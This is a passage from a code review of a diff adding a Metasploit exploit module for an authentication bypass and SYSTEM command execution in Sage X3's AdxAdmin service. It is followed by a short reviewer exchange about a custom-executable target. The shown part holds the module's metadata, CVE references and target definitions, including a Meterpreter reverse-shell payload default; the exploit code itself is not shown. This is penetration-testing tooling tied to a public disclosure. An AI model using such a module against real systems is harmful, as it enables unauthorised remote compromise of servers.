modules/exploits/x3/x3_adxsrv_auth_bypass_cmd_exec.rb

```diff
@@ -0,0 +1,342 @@
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Sage X3 Administration Service Authentication Bypass Command Execution',
+        'Description' => %q{
+          This module leverages an authentication bypass exploit within Sage X3 AdxSrv's administration
+          protocol to execute arbitrary commands as SYSTEM against a Sage X3 Server running an
+          available AdxAdmin service.
+        },
+        'Author' => [
+          'Jonathan Peterson <deadjakk[at]shell.rip>', # @deadjakk
+          'Aaron Herndon' # @ac3lives
+        ],
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2021-07-07',
+        'References' =>
+          [
+            [ 'URL', 'https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/'],
+            [ 'CVE', 'CVE-2020-7388'],
+            [ 'CVE', 'CVE-2020-7387']
+          ],
+        'Privileged' => true,
+        'DefaultOptions' =>
+          {
+            'EXITFUNC' => 'thread',
+            'DisablePayloadHandler' => true
+          },
+        'Platform' => 'win',
+        'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],
+        'Targets' => [
+          [
+            'Windows Command',
+            {
+              'Arch' => [ARCH_CMD],
+              'DefaultOptions' => {
+                'DisablePayloadHandler' => true,
+                'PAYLOAD' => 'cmd/windows/generic',
+                'CMD' => 'whoami'
+              }
+            }
+          ],
+          [
+            'Custom Executable',
+            {
+              'Arch' => [ARCH_CMD],
+              'DefaultOptions' => {
+                'DisablePayloadHandler' => true
+              }
+            }
+          ],
+          [
+            'Windows DLL',
+            {
+              'Platform' => [ 'windows' ],
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'DefaultOptions' => {
+                'DisablePayloadHandler' => false,
+                'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Executable',
+            {
+              'Platform' => [ 'windows' ],
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'DefaultOptions' => {
+                'DisablePayloadHandler' => false,
+                'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [FIRST_ATTEMPT_FAIL],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(1818),
+        OptPath.new('FILENAME', [false, 'File for \'Custom Executable\' target', '']),
```

Comment:
See the comment above regarding `EXE::Custom`.

Reply:
Removed in favor of the EXE::Custom solution